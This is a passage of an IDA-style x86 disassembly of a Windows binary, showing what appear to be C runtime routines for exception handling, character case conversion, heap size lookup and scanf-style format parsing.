arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424870h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41D6E4
cmp byte ptr [eax+8], 0
jz loc_41D6E4
mov eax, [ecx+8]
test eax, eax
jz loc_41D6E4
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41D5D8
mov esi, [ebp+arg_0]
push 1 ; ucb
push dword ptr [esi+18h] ; lp
call sub_420A23
pop ecx
pop ecx
test eax, eax
jz loc_41D6DB
push 1 ; ucb
push edi ; lp
call sub_420A3F
pop ecx
pop ecx
test eax, eax
jz loc_41D6DB
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41D5C9: ; CODE XREF: sub_41D53B+F5�j
push eax
call sub_41D766
pop ecx
pop ecx
mov [edi], eax
jmp loc_41D6E0
; ---------------------------------------------------------------------------
loc_41D5D8: ; CODE XREF: sub_41D53B+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41D632
mov ebx, [ebp+arg_0]
push 1 ; ucb
push dword ptr [ebx+18h] ; lp
call sub_420A23
pop ecx
pop ecx
test eax, eax
jz loc_41D6DB
push 1 ; ucb
push edi ; lp
call sub_420A3F
pop ecx
pop ecx
test eax, eax
jz loc_41D6DB
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_4188B0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41D6E0
mov eax, [edi]
test eax, eax
jz loc_41D6E0
add esi, 8
push esi
jmp short loc_41D5C9
; ---------------------------------------------------------------------------
loc_41D632: ; CODE XREF: sub_41D53B+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1 ; ucb
push dword ptr [ebx+18h] ; lp
jnz short loc_41D67A
call sub_420A23
pop ecx
pop ecx
test eax, eax
jz loc_41D6DB
push 1 ; ucb
push edi ; lp
call sub_420A3F
pop ecx
pop ecx
test eax, eax
jz short loc_41D6DB
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41D766
pop ecx
pop ecx
push eax
push edi
call sub_4188B0
add esp, 0Ch
jmp short loc_41D6E0
; ---------------------------------------------------------------------------
loc_41D67A: ; CODE XREF: sub_41D53B+103�j
call sub_420A23
pop ecx
pop ecx
test eax, eax
jz short loc_41D6DB
push 1 ; ucb
push edi ; lp
call sub_420A3F
pop ecx
pop ecx
test eax, eax
jz short loc_41D6DB
push dword ptr [esi+18h] ; lpfn
call sub_420A5B
pop ecx
test eax, eax
jz short loc_41D6DB
test byte ptr [esi], 4
jz short loc_41D6C1
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D766
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_4184E1
jmp short loc_41D6E0
; ---------------------------------------------------------------------------
loc_41D6C1: ; CODE XREF: sub_41D53B+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D766
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_4184DA
jmp short loc_41D6E0
; ---------------------------------------------------------------------------
loc_41D6DB: ; CODE XREF: sub_41D53B+6A�j
; sub_41D53B+7C�j ...
call sub_41D832
loc_41D6E0: ; CODE XREF: sub_41D53B+98�j
; sub_41D53B+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41D6E4: ; CODE XREF: sub_41D53B+2E�j
; sub_41D53B+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D53B endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D7DC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6FF proc near ; CODE XREF: sub_41D02A+170�p
; sub_41D4CB+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424880h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41D746
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41D746
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_4184DA
or [ebp+var_4], 0FFFFFFFFh
loc_41D746: ; CODE XREF: sub_41D6FF+2A�j
; sub_41D6FF+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D6FF endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D7DC
; =============== S U B R O U T I N E =======================================
sub_41D766 proc near ; CODE XREF: sub_41D53B+8F�p
; sub_41D53B+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41D787
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41D787: ; CODE XREF: sub_41D766+12�j
pop esi
retn
sub_41D766 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D790 proc near ; CODE XREF: sub_41856D+40�p
; sub_41D2D6+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_418859
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41D7CF
mov ecx, 2
loc_41D7CF: ; CODE XREF: sub_41D790+38�j
push ecx
call sub_418859
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41D790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D7DC proc near ; CODE XREF: sub_41D02A:loc_41D1CC�j
; sub_41D374:loc_41D385�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00420A73 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424890h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, dword ptr byte_445EDC+0D4464h
test eax, eax
jz short loc_41D824
mov [ebp+var_4], 1
call eax
jmp short loc_41D820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_41D820: ; CODE XREF: sub_41D7DC+3B�j
and [ebp+var_4], 0
loc_41D824: ; CODE XREF: sub_41D7DC+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
jmp loc_420A73
sub_41D7DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D832 proc near ; CODE XREF: sub_41870F+23�p
; sub_41870F:loc_41877A�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 4248A8h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, dword ptr unk_4400B4
test eax, eax
jz short loc_41D87A
mov [ebp+var_4], 1
call eax ; unk_4400B4
jmp short loc_41D876
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_41D876: ; CODE XREF: sub_41D832+3B�j
and [ebp+var_4], 0
loc_41D87A: ; CODE XREF: sub_41D832+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
jmp sub_41D7DC
sub_41D832 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D888(LPCVOID lpMem)
sub_41D888 proc near ; CODE XREF: sub_418BF3+7�p
; sub_418BF3+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
lpMem = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword ptr byte_445EDC+0D5A48h
push esi
cmp eax, 3
jnz short loc_41D8B1
mov esi, [ebp+lpMem]
push esi
call sub_41B06E
test eax, eax
pop ecx
jz short loc_41D8AE
mov eax, [esi-4]
sub eax, 9
jmp short loc_41D8E6
; ---------------------------------------------------------------------------
loc_41D8AE: ; CODE XREF: sub_41D888+1C�j
push esi
jmp short loc_41D8D8
; ---------------------------------------------------------------------------
loc_41D8B1: ; CODE XREF: sub_41D888+E�j
cmp eax, 2
jnz short loc_41D8D5
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+lpMem]
call sub_41BDC9
add esp, 0Ch
test eax, eax
jz short loc_41D8D5
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_41D8E6
; ---------------------------------------------------------------------------
loc_41D8D5: ; CODE XREF: sub_41D888+2C�j
; sub_41D888+43�j
push [ebp+lpMem] ; lpMem
loc_41D8D8: ; CODE XREF: sub_41D888+27�j
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapSize
loc_41D8E6: ; CODE XREF: sub_41D888+24�j
; sub_41D888+4B�j
pop esi
leave
retn
sub_41D888 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D8E9(WORD MultiByteStr)
sub_41D8E9 proc near ; CODE XREF: sub_418CB8+12B�p
DestStr = byte ptr -4
var_3 = byte ptr -3
MultiByteStr = word ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword ptr byte_445EDC+0D4474h, 0
push ebx
jnz short loc_41D914
mov eax, dword ptr [ebp+MultiByteStr]
cmp eax, 61h
jl loc_41D9B2
cmp eax, 7Ah
jg loc_41D9B2
sub eax, 20h
jmp loc_41D9B2
; ---------------------------------------------------------------------------
loc_41D914: ; CODE XREF: sub_41D8E9+C�j
mov ebx, dword ptr [ebp+MultiByteStr]
cmp ebx, 100h
jge short loc_41D947
cmp cbMultiByte, 1
jle short loc_41D934
push 2 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41D93F
; ---------------------------------------------------------------------------
loc_41D934: ; CODE XREF: sub_41D8E9+3D�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 2
loc_41D93F: ; CODE XREF: sub_41D8E9+49�j
test eax, eax
jnz short loc_41D947
loc_41D943: ; CODE XREF: sub_41D8E9+AF�j
mov eax, ebx
jmp short loc_41D9B2
; ---------------------------------------------------------------------------
loc_41D947: ; CODE XREF: sub_41D8E9+34�j
; sub_41D8E9+58�j
mov edx, dword_43DD30
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41D96A
and byte ptr [ebp+0Ah], 0
mov byte ptr [ebp+MultiByteStr], al
mov byte ptr [ebp+MultiByteStr+1], bl
push 2
jmp short loc_41D973
; ---------------------------------------------------------------------------
loc_41D96A: ; CODE XREF: sub_41D8E9+71�j
and byte ptr [ebp+MultiByteStr+1], 0
mov byte ptr [ebp+MultiByteStr], bl
push 1
loc_41D973: ; CODE XREF: sub_41D8E9+7F�j
pop eax
lea ecx, [ebp+DestStr]
push 1 ; int
push 0 ; CodePage
push 3 ; cchDest
push ecx ; lpDestStr
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 200h ; dwMapFlags
push dword ptr byte_445EDC+0D4474h ; Locale
call sub_41EE0F
add esp, 20h
test eax, eax
jz short loc_41D943
cmp eax, 1
jnz short loc_41D9A5
movzx eax, [ebp+DestStr]
jmp short loc_41D9B2
; ---------------------------------------------------------------------------
loc_41D9A5: ; CODE XREF: sub_41D8E9+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+DestStr]
shl eax, 8
or eax, ecx
loc_41D9B2: ; CODE XREF: sub_41D8E9+14�j
; sub_41D8E9+1D�j ...
pop ebx
leave
retn
sub_41D8E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9B5 proc near ; CODE XREF: sub_418ED7+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
WideCharStr = word ptr -3Eh
var_3C = dword ptr -3Ch
MultiByteStr = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
CharType = word ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41E3BB
mov edi, [ebp+arg_0]
jmp short loc_41D9E4
; ---------------------------------------------------------------------------
loc_41D9DF: ; CODE XREF: sub_41D9B5+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41D9E4: ; CODE XREF: sub_41D9B5+28�j
cmp cbMultiByte, 1
jle short loc_41D9FC
movzx eax, al
push 8 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41DA0B
; ---------------------------------------------------------------------------
loc_41D9FC: ; CODE XREF: sub_41D9B5+36�j
mov ecx, dword_43DD30
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41DA0B: ; CODE XREF: sub_41D9B5+45�j
cmp eax, ebx
jz short loc_41DA45
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41E442
pop ecx
pop ecx
push eax
call sub_41E42B
movzx eax, byte ptr [esi+1]
inc esi
push eax ; CharType
call sub_420B52
add esp, 0Ch
loc_41DA33: ; CODE XREF: sub_41D9B5+8E�j
test eax, eax
jz short loc_41DA45
movzx eax, byte ptr [esi+1]
inc esi
push eax ; CharType
call sub_420B52
pop ecx
jmp short loc_41DA33
; ---------------------------------------------------------------------------
loc_41DA45: ; CODE XREF: sub_41D9B5+58�j
; sub_41D9B5+80�j
cmp byte ptr [esi], 25h
jnz loc_41E327
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41DA7C: ; CODE XREF: sub_41D9B5+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp cbMultiByte, 1
jle short loc_41DA99
movzx eax, bl
push 4 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41DAA8
; ---------------------------------------------------------------------------
loc_41DA99: ; CODE XREF: sub_41D9B5+D3�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41DAA8: ; CODE XREF: sub_41D9B5+E2�j
test eax, eax
jz short loc_41DABE
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DABE: ; CODE XREF: sub_41D9B5+F5�j
cmp ebx, 4Eh
jg short loc_41DB01
jz short loc_41DB23
cmp ebx, 2Ah
jz short loc_41DAFC
cmp ebx, 46h
jz short loc_41DB23
cmp ebx, 49h
jz short loc_41DADE
cmp ebx, 4Ch
jnz short loc_41DB10
inc [ebp+var_D]
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DADE: ; CODE XREF: sub_41D9B5+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41DB10
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41DB10
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DAFC: ; CODE XREF: sub_41D9B5+113�j
inc [ebp+var_E]
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DB01: ; CODE XREF: sub_41D9B5+10C�j
cmp ebx, 68h
jz short loc_41DB1D
cmp ebx, 6Ch
jz short loc_41DB15
cmp ebx, 77h
jz short loc_41DB18
loc_41DB10: ; CODE XREF: sub_41D9B5+122�j
; sub_41D9B5+12D�j ...
inc [ebp+var_F]
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DB15: ; CODE XREF: sub_41D9B5+154�j
inc [ebp+var_D]
loc_41DB18: ; CODE XREF: sub_41D9B5+159�j
inc [ebp+var_5]
jmp short loc_41DB23
; ---------------------------------------------------------------------------
loc_41DB1D: ; CODE XREF: sub_41D9B5+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41DB23: ; CODE XREF: sub_41D9B5+107�j
; sub_41D9B5+10E�j ...
cmp [ebp+var_F], 0
jz loc_41DA7C
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41DB48
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41DB48: ; CODE XREF: sub_41D9B5+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41DB66
mov al, [esi]
cmp al, 53h
jz short loc_41DB62
cmp al, 43h
jz short loc_41DB62
or [ebp+var_5], 0FFh
jmp short loc_41DB66
; ---------------------------------------------------------------------------
loc_41DB62: ; CODE XREF: sub_41D9B5+1A1�j
; sub_41D9B5+1A5�j
mov [ebp+var_5], 1
loc_41DB66: ; CODE XREF: sub_41D9B5+19B�j
; sub_41D9B5+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41DB9F
cmp esi, 63h
jz short loc_41DB90
cmp esi, 7Bh
jz short loc_41DB90
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41E442
pop ecx
jmp short loc_41DB9B
; ---------------------------------------------------------------------------
loc_41DB90: ; CODE XREF: sub_41D9B5+1C5�j
; sub_41D9B5+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
loc_41DB9B: ; CODE XREF: sub_41D9B5+1D9�j
pop ecx
mov dword ptr [ebp+CharType], eax
loc_41DB9F: ; CODE XREF: sub_41D9B5+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41DBAF
cmp [ebp+var_C], eax
jz loc_41E38B
loc_41DBAF: ; CODE XREF: sub_41D9B5+1EF�j
cmp esi, 6Fh
jg loc_41DE16
jz loc_41E0C8
cmp esi, 63h
jz loc_41DDF3
cmp esi, 64h
jz loc_41E0C8
jle loc_41DE40
cmp esi, 67h
jle short loc_41DC13
cmp esi, 69h
jz short loc_41DBFB
cmp esi, 6Eh
jnz loc_41DE40
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41E2F6
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41DBFB: ; CODE XREF: sub_41D9B5+229�j
push 64h
pop esi
loc_41DBFE: ; CODE XREF: sub_41D9B5+480�j
mov ebx, dword ptr [ebp+CharType]
cmp ebx, 2Dh
jnz loc_41DE88
mov [ebp+var_17], 1
jmp loc_41DE8D
; ---------------------------------------------------------------------------
loc_41DC13: ; CODE XREF: sub_41D9B5+224�j
mov ebx, dword ptr [ebp+CharType]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41DC2F
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41DC34
; ---------------------------------------------------------------------------
loc_41DC2F: ; CODE XREF: sub_41D9B5+26A�j
cmp ebx, 2Bh
jnz short loc_41DC4B
loc_41DC34: ; CODE XREF: sub_41D9B5+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp short loc_41DC4E
; ---------------------------------------------------------------------------
loc_41DC4B: ; CODE XREF: sub_41D9B5+27D�j
mov edi, [ebp+arg_0]
loc_41DC4E: ; CODE XREF: sub_41D9B5+294�j
cmp [ebp+var_20], 0
jz short loc_41DC5D
cmp [ebp+var_C], 15Dh
jle short loc_41DC64
loc_41DC5D: ; CODE XREF: sub_41D9B5+29D�j
mov [ebp+var_C], 15Dh
loc_41DC64: ; CODE XREF: sub_41D9B5+2A6�j
; sub_41D9B5+2F2�j
cmp cbMultiByte, 1
jle short loc_41DC79
push 4 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41DC84
; ---------------------------------------------------------------------------
loc_41DC79: ; CODE XREF: sub_41D9B5+2B6�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 4
loc_41DC84: ; CODE XREF: sub_41D9B5+2C2�j
test eax, eax
jz short loc_41DCA9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DCA9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp short loc_41DC64
; ---------------------------------------------------------------------------
loc_41DCA9: ; CODE XREF: sub_41D9B5+2D1�j
; sub_41D9B5+2DB�j
cmp byte_43DF40, bl
jnz short loc_41DD17
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DD17
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
mov al, byte_43DF40
mov [esi], al
pop ecx
mov dword ptr [ebp+CharType], ebx
inc esi
loc_41DCD2: ; CODE XREF: sub_41D9B5+360�j
cmp cbMultiByte, 1
jle short loc_41DCE7
push 4 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41DCF2
; ---------------------------------------------------------------------------
loc_41DCE7: ; CODE XREF: sub_41D9B5+324�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 4
loc_41DCF2: ; CODE XREF: sub_41D9B5+330�j
test eax, eax
jz short loc_41DD17
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DD17
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp short loc_41DCD2
; ---------------------------------------------------------------------------
loc_41DD17: ; CODE XREF: sub_41D9B5+2FA�j
; sub_41D9B5+304�j ...
cmp [ebp+var_1C], 0
jz loc_41DDAF
cmp ebx, 65h
jz short loc_41DD2F
cmp ebx, 45h
jnz loc_41DDAF
loc_41DD2F: ; CODE XREF: sub_41D9B5+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DDAF
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov dword ptr [ebp+CharType], ebx
jnz short loc_41DD56
mov [esi], al
inc esi
jmp short loc_41DD5B
; ---------------------------------------------------------------------------
loc_41DD56: ; CODE XREF: sub_41D9B5+39A�j
cmp ebx, 2Bh
jnz short loc_41DD79
loc_41DD5B: ; CODE XREF: sub_41D9B5+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41DD6A
and [ebp+var_C], eax
jmp short loc_41DD79
; ---------------------------------------------------------------------------
loc_41DD6A: ; CODE XREF: sub_41D9B5+3AE�j
; sub_41D9B5+3F8�j
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
loc_41DD79: ; CODE XREF: sub_41D9B5+3A4�j
; sub_41D9B5+3B3�j
cmp cbMultiByte, 1
jle short loc_41DD8E
push 4 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41DD99
; ---------------------------------------------------------------------------
loc_41DD8E: ; CODE XREF: sub_41D9B5+3CB�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 4
loc_41DD99: ; CODE XREF: sub_41D9B5+3D7�j
test eax, eax
jz short loc_41DDAF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DDAF
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41DD6A
; ---------------------------------------------------------------------------
loc_41DDAF: ; CODE XREF: sub_41D9B5+366�j
; sub_41D9B5+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41E42B
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41E3BB
cmp [ebp+var_E], 0
jnz loc_41E31C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call dword_440098
add esp, 0Ch
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41DDF3: ; CODE XREF: sub_41D9B5+20C�j
cmp [ebp+var_20], eax
jnz short loc_41DE02
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41DE02: ; CODE XREF: sub_41D9B5+441�j
cmp [ebp+var_5], 0
jle short loc_41DE0C
mov [ebp+var_16], 1
loc_41DE0C: ; CODE XREF: sub_41D9B5+451�j
mov edi, 4400C0h
jmp loc_41DF21
; ---------------------------------------------------------------------------
loc_41DE16: ; CODE XREF: sub_41D9B5+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41E0C4
sub eax, 3
jz loc_41DF12
dec eax
dec eax
jz loc_41E0C8
sub eax, 3
jz loc_41DBFE
sub eax, 3
jz short loc_41DE64
loc_41DE40: ; CODE XREF: sub_41D9B5+21B�j
; sub_41D9B5+22E�j
movzx eax, byte ptr [ebx]
cmp eax, dword ptr [ebp+CharType]
jnz loc_41E38B
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41E31C
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41DE64: ; CODE XREF: sub_41D9B5+489�j
cmp [ebp+var_5], 0
jle short loc_41DE6E
mov [ebp+var_16], 1
loc_41DE6E: ; CODE XREF: sub_41D9B5+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41DF25
mov eax, edi
lea edi, [eax+1]
jmp loc_41DF21
; ---------------------------------------------------------------------------
loc_41DE88: ; CODE XREF: sub_41D9B5+24F�j
cmp ebx, 2Bh
jnz short loc_41DEAF
loc_41DE8D: ; CODE XREF: sub_41D9B5+259�j
dec [ebp+var_C]
jnz short loc_41DE9E
cmp [ebp+var_20], 0
jz short loc_41DE9E
mov [ebp+var_F], 1
jmp short loc_41DEAF
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: sub_41D9B5+4DB�j
; sub_41D9B5+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
loc_41DEAF: ; CODE XREF: sub_41D9B5+4D6�j
; sub_41D9B5+4E7�j
cmp ebx, 30h
jnz loc_41E0FD
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
mov ebx, eax
pop ecx
cmp bl, 78h
mov dword ptr [ebp+CharType], ebx
jz short loc_41DEFD
cmp bl, 58h
jz short loc_41DEFD
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41DEE7
push 6Fh
loc_41DEE1: ; CODE XREF: sub_41D9B5+55B�j
pop esi
jmp loc_41E0FD
; ---------------------------------------------------------------------------
loc_41DEE7: ; CODE XREF: sub_41D9B5+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E42B
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41E0FA
; ---------------------------------------------------------------------------
loc_41DEFD: ; CODE XREF: sub_41D9B5+517�j
; sub_41D9B5+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
pop ecx
mov ebx, eax
